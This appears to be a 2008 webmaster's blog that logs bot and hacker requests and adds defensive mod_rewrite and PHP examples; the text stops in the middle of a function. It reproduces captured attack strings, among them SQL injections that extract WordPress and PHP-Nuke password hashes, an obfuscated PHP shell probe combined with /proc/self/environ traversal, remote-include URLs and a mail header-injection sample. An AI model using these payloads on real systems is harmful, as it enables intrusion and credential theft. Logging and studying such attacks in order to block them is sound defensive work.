Dec 3, 2008

'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker

Just detected this hacker. The IP is blocked by no-more-funn.moensted.dk.

What is this user agent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)

www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

Two things in the first pair of requests are worth noting. The %2527 is a double-encoded single quote: a filter (or the web server's single decode) sees only %27 and lets it through, and the quote that breaks out of the query appears only if the application decodes the value a second time, which is what the attacker is betting on. The second attempt pads the SELECT out to five columns (null,CONCAT(...),null,null,null), which is how a UNION is matched to the column count of the original query; both are after user_pass for user ID 1 in wp_users.

Nov 20, 2008

babycaleb.mvhosted.com hacker attacks

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new URL into websites.
The site, when inspected using Sam Spade to avoid any virus infection, shows the exploit is in the HTML just like before.

A search shows it has infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com


Send abuse messages to theplanet.com

Nov 12, 2008

itsapic.com/crawler.html another beta

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx


This bot was scanning WebRing looking for sites and got blocked by BB, so watch for it.
The website does not say what it is doing or ask permission to enter your site.


Add to robots.txt:
User-agent: itsapic.com_crawler
Disallow: /

Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

I am getting a lot of these requests lately.

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPs, all trying to remote-load this page. Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk. AVG detects a virus, but it still gets into your system. Look for:
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated--
The site has now been shutdown.

A search of Google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this attack and they are allowing the attack to spread. Perhaps they are involved in the attack?

Sep 11, 2008

serverkompetenz.net Hackers

serverkompetenz.net is a hacker, not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent: (the whole User-Agent header was the following PHP; each obfuscated string decodes to the function named in the comment)
$x0e="\145x\x65\x63";                               // exec
$x0f="\x66eo\146";                                  // feof
$x10="\x66\x72ea\x64";                              // fread
$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";  // function_exists
$x12="i\163\x5f\162\x65s\157ur\x63\x65";            // is_resource
$x13="\152\157\x69\156";                            // join
$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";     // ob_get_contents
$x15="ob\137\x65\156d\137\x63lea\156";              // ob_end_clean
$x16="\x6fb_st\x61\x72\164";                        // ob_start
$x17="\x70\141\163s\164\x68\162\165";               // passthru
$x18="\x70\143\154ose";                             // pclose
$x19="p\157\160e\x6e";                              // popen
$x1a="\163h\145\154l\137\x65\170e\143";             // shell_exec
$x1b="\x73\x79s\x74e\x6d";                          // system
// x0b($cmd): run a shell command through whichever of the above is not disabled, return its output
function x0b($x0b){
  global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
  $x0c = '';
  if (!empty($x0b)) {
    if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13("\n",$x0c); }                      // exec(), output lines joined
    elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }                                  // shell_exec()
    elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }              // system() captured via output buffering
    elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }            // passthru() captured the same way
    elseif(@$x12($x0d = @$x19($x0b,"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);}  // popen(cmd,"r")
  }
  return $x0c;
}
echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");   // echo cr4nk_rocks


81.169.152.101 h986442.serverkompetenz.net

The bot put a script in place of its user agent string. The two requests work together: /proc/self/environ is the environment block of the process serving the request, and it contains HTTP_USER_AGENT, so if index.php hands the k parameter to include(), the PHP sitting in the User-Agent header is executed. Decoded, that PHP is a command-execution probe: it tries exec, shell_exec, system, passthru and popen in turn and prints cr4nk_rocks if any of them works, which tells the scanner it has a shell on the box.

It then tried to remote-load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net

Aug 22, 2008

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

The latest hack running right now is an injection attempt using a string like this.

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot attack and is coming from everywhere.
They come in two at a time from the same IP.

They are trying to inject code into your site's database so that your pages display an iframe that takes people to another site. The payload is Transact-SQL (DECLARE @S ... EXEC(@S)), so it only does anything against applications backed by Microsoft SQL Server; that is why the targets are ASP, ColdFusion and Perl sites rather than PHP, which rarely sits in front of one. The CAST(0x... AS CHAR(4000)) wrapper only hides the real statement from simple keyword filters (the visible prefix 0x4445434C is "DECL", the start of a second DECLARE). See more here: isc.sans.org

Also see this post, which recommends:


RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]

But a better page on how to block this with .htaccess is located here.
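A caveat on the two conditions quoted above: in mod_rewrite, %{REQUEST_URI} is the path part of the request only and does not contain the query string, and these payloads arrive in the query string (?id=1;DECLARE%20@S...), so as written the conditions never match. The first line also lacks [NC], and the second ends in a dangling [OR] with no RewriteRule to act on it. The fragment below is an added example (not from either of the linked posts) that keys on the query string and returns 403:

```apache
RewriteEngine On
# The keywords sit in the query string; %{REQUEST_URI} never sees them.
# mod_rewrite matches QUERY_STRING before URL-decoding, so %20 is still "%20"
# here; the alternation also accepts "+" and a literal space.
RewriteCond %{QUERY_STRING} DECLARE(%20|\+|\s)*@ [NC,OR]
RewriteCond %{QUERY_STRING} CAST\(0x[0-9a-f]+ [NC,OR]
RewriteCond %{QUERY_STRING} EXEC\((%20|\+|\s)*@ [NC]
RewriteRule .* - [F,L]
```

The patterns are deliberately narrow (a variable after DECLARE, a hex literal after CAST) so that ordinary pages whose text happens to contain the word "cast" are not blocked.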


They are also scanning for a delay in the page return, so any script that sleeps when it detects a hack must have the sleep removed, or they will come back and hit you harder.


The hits alone will bring your server down if you try to ban all the IPs being used, so I have modified the hacker modules.

Update the hacker modules here.




You will also want to download your databases and scan them for iframes and JavaScript.

Aug 6, 2008

magnum.liquidweb.com hacker

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
The hacker hits with this string, trying to get my server to run his scripts.

Then, after getting banned, he keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

They are all scripts used by hackers to display a test message on your server:
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/

Jun 30, 2008

After banning the domain amazonaws.com because they are hosting bots, I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com


-----Update: AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com


Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam


The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

Spam source means the system was found, via manual spam header parsing, to be the origin of spam.

Update July 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com

Jun 17, 2008

openrbl.org is gone

openrbl.org is down and I need a replacement that can do a lookup on all of the blocklists and do a DNS lookup.

I did find a replacement of sorts. Change the admin.php $dns_lookup setting to:

$dns_lookup ="http://www.robtex.com/rbl/";


If anyone knows of one please post it.

Jun 6, 2008

Request contained a malicious JavaScript or SQL injection attack

Bad Behavior is now blocking what it says is a SQL injection, but all it's really looking for is a # in the header. So I end up seeing crap like this.

I think this may be a bug in Bad Behavior.

Update: I am still seeing this from the Yahoo bot.

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.8.122 llf520018.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.17.186 llf520164.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.22.159 llf520079.crawl.yahoo.net



// Broken spambots send URLs with various invalid characters
// Some broken browsers send the #vector in the referer field :(
if (strpos($package['request_uri'], "#") !== FALSE) {
    return "dfd9b1ad";
}

Jun 2, 2008

robot on pox1s.craigslist.org

Why would craigslist.org be running a bot?

403 Required header 'Accept' missing
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
66.150.243.17 pox1s.craigslist.org

Jun 1, 2008

barton.centeralnet.com bot

Agent: -NO AGENT-
216.32.80.66 barton.centeralnet.com

Some type of web hosting company in Iran.

developmentseed.org Bot 207.162.216.100 www1.developmentseed.org

Agent: python-urllib/2.4
207.162.216.100 www1.developmentseed.org

Why is developmentseed.org scanning my site using a free bot library?

I don't see anything on the site about them running a bot.

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a PHP script located at:
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the osCommerce search routine.
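The requests in the Sep 11, Aug 6 and Jun 1 posts (k=, feed= and categories_id= pointing at a URL or at a ../ chain ending in /proc/self/environ) all probe for the same bug: a request parameter passed straight to include(). The PHP below is an added example, not code from PHP-Nuke, osCommerce or the original posts, and the module file names in it are assumed. It shows the vulnerable shape beside a hardened version that maps the parameter through a fixed list, plus a realpath-based check for the case where a path really must be derived from input:

```php
<?php
// Added example, not code from PHP-Nuke, osCommerce or the original posts.
// Vulnerable and hardened forms of "load a module named by the request".

// VULNERABLE: the shape of code the k=, feed= and categories_id= requests look for.
// With allow_url_include on, k=http://evil/x.txt fetches and runs remote PHP.
// Even with it off, k=/../../../proc/self/environ includes the server's own
// environment block, and since that block holds HTTP_USER_AGENT, PHP placed in
// the User-Agent header gets executed.
function load_module_vulnerable(string $k): void
{
    include $k;
}

// HARDENED: the parameter selects from a fixed map; the value never becomes a path.
// Unknown names fail closed with a 404. File names here are assumed, not PHP-Nuke's.
const MODULES = [
    'downloads' => 'modules/Downloads/index.php',
    'news'      => 'modules/News/index.php',
    'search'    => 'modules/Search/index.php',
];

function resolve_module(string $k): ?string
{
    return MODULES[$k] ?? null;
}

function load_module_hardened(string $k): void
{
    $path = resolve_module($k);
    if ($path === null) {
        http_response_code(404);
        exit('No such module');
    }
    include __DIR__ . '/' . $path;
}

// When a path must be built from input (a theme name, say), pin it under a base
// directory and reject anything that escapes it or is not a plain file there.
// realpath() collapses the ../ chain and returns false for URL wrappers; the
// scheme check in front of it refuses http://, ftp://, php://, data: and friends
// explicitly rather than relying on that (on Windows this also rejects "C:").
function safe_path_under(string $base, string $userPart): ?string
{
    if ($userPart === '' || preg_match('/^[a-z][a-z0-9+.-]*:/i', $userPart)) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $userPart);
    if ($baseReal === false || $target === false) {
        return null;
    }
    if (strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0 || !is_file($target)) {
        return null;
    }
    return $target;
}

// The request shapes from the logs, run against the resolver only (nothing is included).
foreach (['downloads', 'http://www.jfc.info/x.txt', '/../../../../proc/self/environ'] as $k) {
    printf("%-40s -> %s\n", $k, resolve_module($k) ?? 'rejected');
}
```

The allowlist is the real fix; safe_path_under() is the fallback for code that cannot be restructured around a map, and it is only as good as the base directory it is pinned to.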

Lame Botnets

When you see the same lame bug in a bot coming from several IPs at the same time, it must be a botnet. If you own any of these, please remove the bots from your system.


[05-31-2008-12:24:55] bad-behavior 417 Header 'Expect' prohibited; resend without Expect /submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
210.138.109.72 72.109.138.210.bn.2iij.net

[05-31-2008-12:25:03] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:08] bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
216.106.84.150 mx3.ntm.org

[05-31-2008-12:25:10] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:17] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
129.142.64.65 chef.catpipe.net

[05-31-2008-12:25:23] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
213.134.40.89 baphealth.c.mad.interhost.com


[05-31-2008-12:26:35] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:26:47] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
62.3.32.27

[05-31-2008-12:26:54] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
62.3.32.27

[05-31-2008-12:27:20] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
163.24.235.249

May 26, 2008

Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)

bad-behavior
403 Required header 'Accept' missing
Agent: Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)
64.237.57.194 64-237-57-194.reliableservers.com

MrCarlito-0.1 is an experimental spider that collects header & link information from web pages. The spider is written in PERL (Practical Extraction and Report Language), and uses the LWP::UserAgent Class. Currently this spider does not delve into websites, it simply obtains the headers & hostnames contained in your web page index.


Hmm, you had better fix this broken bot if you plan on using it for a real website.
You're blocked because you were detected loading web pages, not headers.

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]


blocked by bad-behavior
403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
67.202.57.133 ec2-67-202-57-133.compute-1.amazonaws.com


Another broken bot running on amazonaws.com

www.radian6.com/crawler

Wow, another corporate snoop bot. See http://www.radian6.com/crawler/


r6_feedfetcher(www.radian6.com/crawler)
r6_commentreader(www.radian6.com/crawler)
142.166.3.122
142.166.170.93
142.166.170.92

It does not follow the robots.txt file, so you have to email someone to tell them to stop burning up your bandwidth. Huh?

I really hate these corporate PR snoops that think you have to serve content to them.
I wonder if they ever thought about the fact that taking my content and serving it up to subscribers (charging for it) without my permission is a criminal copyright violation.

May 15, 2008

IncrediBILL's Random Rants: Impact On Your Bandwidth Will Be Minimal My Ass

This just about sums up where traffic is going today.


skweezer.net open proxy service

Post UPDATED:

See the original post here. This site, skweezer.net,
is a proxy for mobile content. It will allow users that you have banned to bypass your ban and use this site as a proxy.

Bad Behavior no longer blocks this site, and its domain has changed.
It also no longer inserts adverts around your content but strips out your adverts.

Old ones
65.38.160.138 hugehosting.com
65.38.160.162 hugehosting.com
65.38.160.160 hugehosting.com
New ones so far
65.38.160.138 gwc05.gwcorp.net
65.38.160.156 gwc14.gwcorp.net

Likely more.

Add the domain name to the domain ban file of MMAUTOBAN:
hugehosting.com,proxy
gwcorp.net,proxy


And add the IP block to your .htaccess file:
deny from 65.38.160.0/24

May 10, 2008

yandex.ru bot

yandex/1.01.001 (compatible; win16; h)
Last Hit From walrus020.yandex.ru 77.88.22.115
First Hit From walrus085.yandex.ru 77.88.22.151


Violates the robots file; see http://www.braemoor.co.uk

67.202.15.206 compute-1.amazonaws.com www.powerset.com

This company, powerset.com, says "we employ a small army of PhDs", but they know nothing about building bots. The blog they run won't even take comments without giving an error page.

bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
67.202.15.206 ec2-67-202-15-206.z-1.compute-1.amazonaws.com

amazonaws.com keeps showing up in my logs. It looks like this is a web hosting division of Amazon, so we may be able to ban it without banning Amazon.

May 1, 2008

List of hacker servers

I ran into this site that is keeping a list of the sites hosting the scripts used to attack your site. The user tries to get your site to run a script located on one of these sites, and once it does, he can take over your site.
The hacking is explained here http://www.whyron.com/http.htm

List is here http://www.whyron.com/http0.htm

You should add the domains from this list to the hackers.txt file in MMAUTOBAN to ban users attempting to inject these scripts on your server.

Free submit script for your website.

Ran into this; it's a free submit form. I don't use it since I wrote my own; perhaps when I have the time I will make a free version of it.

This one looks like it works; just don't use the reply-to-user options, since you should never have a form reply to someone, because it can be used to relay spam via your server.

GBCF-v3 Secure & Accessible Form Script


While you're at it, never take input from a form and use it to create message headers like To: and Subject:. Always hard-code the headers and put the input fields inside the body of the message. The reason is that mail() passes the headers string to the MTA as-is, so a newline in a form field lets the sender append Bcc: or To: lines of his own, which is the relay trick the previous paragraph warns about.
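As an added example (not the GBCF script above and not the author's own form code), the following PHP shows the header-injection attempt and the fixed-header pattern side by side; the mailbox addresses are assumed and the inputs are constructed:

```php
<?php
// Added example, not the GBCF script and not the author's own form handler.
// Form input must stay out of mail headers: mail() hands the headers string to
// the MTA, so a CR/LF in an address or subject field lets a spammer append
// Bcc:/To: lines and relay through your server.

// What header injection looks like: the field goes straight into a header line.
function unsafe_headers(string $fromField): string
{
    return "From: $fromField\r\n";      // DO NOT DO THIS
}

// One-line field: refuse anything that could start a new header line.
function clean_header_field(string $value, int $maxLen = 100): ?string
{
    if (preg_match('/[\r\n\0]/', $value) || strlen($value) > $maxLen) {
        return null;
    }
    return trim($value);
}

// Build the message with a fixed recipient and fixed headers; user data goes in
// the body only. Returns null when the submission should be dropped.
function build_contact_mail(array $post): ?array
{
    $name    = clean_header_field($post['name'] ?? '');
    $email   = clean_header_field($post['email'] ?? '');
    $message = (string)($post['message'] ?? '');

    if ($name === null || $email === null || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;                                  // refuse rather than "fix" the input
    }
    // Even a clean address stays out of the headers: it is quoted in the body and
    // the site owner replies by hand. To:, From: and Subject: are hard-coded.
    $body = "Name: $name\nEmail: $email\n\n" . str_replace("\0", '', $message);
    return [
        'to'      => 'webmaster@example.invalid',     // assumed mailbox
        'subject' => 'Website contact form',
        'body'    => wordwrap($body, 70, "\n", true),
        'headers' => "From: contact-form@example.invalid\r\nX-Mailer: PHP/" . PHP_VERSION,
    ];
}

// Constructed inputs: a relay attempt and a normal submission.
$attempt = [
    'name'    => 'Bob',
    'email'   => "bob@example.invalid\r\nBcc: victim1@example.invalid,victim2@example.invalid",
    'message' => 'hi',
];
$normal = ['name' => 'Alice', 'email' => 'alice@example.invalid', 'message' => 'Hello there'];

echo unsafe_headers($attempt['email']);             // prints the injected Bcc: line
var_dump(build_contact_mail($attempt) === null);    // bool(true): the attempt is rejected
$m = build_contact_mail($normal);
// mail($m['to'], $m['subject'], $m['body'], $m['headers']);   // uncomment to actually send
```

Rejecting the submission outright is deliberate: stripping the newlines and sending anyway would still deliver a message the attacker shaped, and a bounced form is cheaper than an open relay.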

Apr 23, 2008

beta.rover-host.com SPAMMER

/blog.php/?feed=rss2 POST HTTP/1.0 spam=[+Content-Type=application/x-www-form-urlencoded&+charset=utf-8&+title=anal nude wevcams&+url=http://www.__removed___.com&+blog_name=anal nude wevcams&+excerpt=anal nude wevcams&]
Agent: snoopy v1.2.3
64.22.110.2 beta.rover-host.com

Caught you, spammer, trying to inject spam into my RSS feed on WordPress.

outlookconnector/1.9 (tmstmpext; msoffice 12)

All Hits From ip68-11-62-209.no.no.cox.net 68.11.62.209

Anyone know what this user agent is?

This thing is a hog, with all usage coming from one user on Cox.

I am banning it unless someone knows what it is.

Apr 14, 2008

twiceler www.cuill.com Bandwidth HOG

This bot just cannot take no for an answer. It keeps trying to scan my site.

Tried adding it to robots.txt on 12/5/06, and testing in '08 still shows it scanning my system. It was just caught ignoring the robots file and fell into unlisted bot traps.

IP BAN Fell into unlisted bot trap
Agent: mozilla/5.0 (twiceler-0.9 http://www.cuill.com/twiceler/robot.html)
208.36.144.8 crawl-17.cuill.com

See more info on what others are saying here


The user agent has changed since I last saw it, and they are now using new IPs.

upcomingvideo.info attempts UNION injections

The request for /wp-admin/admin-ajax.php caused an autoban. The injection rides in the wordpressuser_ cookie rather than in the URL (note the empty URL field in the alarm below), so a check that only inspects the query string would never see it: the UNION ALL SELECT pulls user_pass for user ID 1 out of wp_users, and the IF(LENGTH(user_pass)>31,BENCHMARK(...),3) tail is the usual conditional-delay construction for confirming an injection blind.

ALARM: UNION ALL SELECT injection string=[ cookie=wordpressuser_e3e8b95c4f440b1cebd0041c4a3dda48=xyz%27 UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM wp_users WHERE ID=1 AND IF(LENGTH(user_pass)>31,BENCHMARK(1,MD5(1337)),3)/*; wordpresspass_e3e8b95c4f440b1cebd0041c4a3dda48=p0hh&]

---
* M&M Autoban V3.8 *
IP: [82.146.52.117 upcomingvideo.info ] Counter[44602]
URL: []
Agent: [mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727)]
Cookie:[]




upcomingvideo.info, this gets you banned from all sites.

Mar 27, 2008

Installing autoban script in PHPNUKE

>> From: ___@gmail.com
>> In the phpnuke setup, it mentions adding something above $modfiles in the modules.php file. I can't see that in mine; any ideas on where to put this extra piece of code to stop the union injections?


Since your email address is no good, I will answer you here.


Be sure you have v3.8 and the latest BB.
After you have installed the script and have it running, click on Setup.
Click on phpnuke setup. This generates the strings to insert.

Insert the green line listed on that page into your script to activate protection.
The red lines use the built-in phpnuke detection to ban any hacker it finds.

The union injection hacks can be added, but they are no longer needed, because the script now does that inside the hacker scan module, and you can add any hacks you find to that scan.

Mar 20, 2008

What is blogged_crawl/0.3?

Just what is this blogged crawler?

Agent: blogged_crawl/0.2
74.52.1.194 c2.1.344a.static.theplanet.com


Agent: blogged_crawl/0.3
74.54.159.147 93.9f.364a.static.theplanet.com

Mar 13, 2008

speedy.telkom.net.id union injections

A joker from speedy.telkom.net.id attempted a UNION injection into the database. The target is the PHP-Nuke Downloads module's cid parameter; counter, aid and pwd are column names from PHP-Nuke's nuke_authors table, so the SELECT is after the admin password hash, with 0x7c (a "|") as the separator.


ALARM: union%20select injection string=[ name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20concat(pwd,0x7c,0x4861636B2042792053694 ]

IP: [125.163.204.65 65.subnet125-163-204.speedy.telkom.net.id ]
Agent: [mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; fdm)]
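The injection strings logged in the Dec 3, Aug 22 and Apr 14 posts and in this one are all obfuscated the same few ways: percent-encoding applied twice (the %2527 in the WordPress request is a double-encoded quote that survives one decode as %27), MySQL CHAR(...) calls and 0x hex literals (0x7c is "|", and the truncated 0x4861636B... above spells "Hack By Si"), and the same 0x form inside the T-SQL CAST(... AS CHAR(4000)). The PHP below is an added example, not code from the original posts or from M&M Autoban: it peels those layers off and then names the indicators a ban rule should key on. The sample strings are constructed to match the logged shapes, with a made-up iframe statement standing in for the removed hex, and the function names are mine.

```php
<?php
// Added example, not code from the original posts or from M&M Autoban.
// Peels the obfuscation layers off the injection strings logged on this page so
// the attacker's SQL is readable, then names the indicators worth alarming on.
// Sample inputs are constructed to match the logged shapes; they are not captures.

// Percent-decode until the text stops changing: %2527 -> %27 -> '
// A filter that decodes once (or never) sees %27 and lets it through.
function decode_repeatedly(string $s, int $max = 5): string
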